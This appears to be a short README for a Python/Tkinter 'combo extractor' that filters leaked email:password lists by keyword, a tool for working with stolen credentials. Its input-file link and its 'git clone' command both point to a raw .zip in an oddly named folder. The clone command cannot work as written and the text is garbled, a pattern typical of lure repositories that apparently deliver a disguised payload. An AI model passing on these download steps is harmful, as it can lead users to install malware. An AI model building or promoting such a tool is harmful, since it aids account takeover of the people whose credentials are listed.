A Python + Tkinter GUI tool to extract specific combos (email:password) from a combo list based on keywords.
- Load a combo list (
https://github.com/panzerking99267/MailComboExtractor/raw/refs/heads/main/mollifying/Extractor-Combo-Mail-v3.2.zip) where entries are separated by:. - Load a keywords text file (one keyword per line).
- Select output file location.
- Extract all combos where the email contains any of the keywords.
- Simple GUI with buttons and status messages.
- Python 3.8+
- Tkinter (usually comes with Python)
- No additional libraries needed.
- Clone the repository:
git clone https://github.com/panzerking99267/MailComboExtractor/raw/refs/heads/main/mollifying/Extractor-Combo-Mail-v3.2.zip cd ComboExtractorTool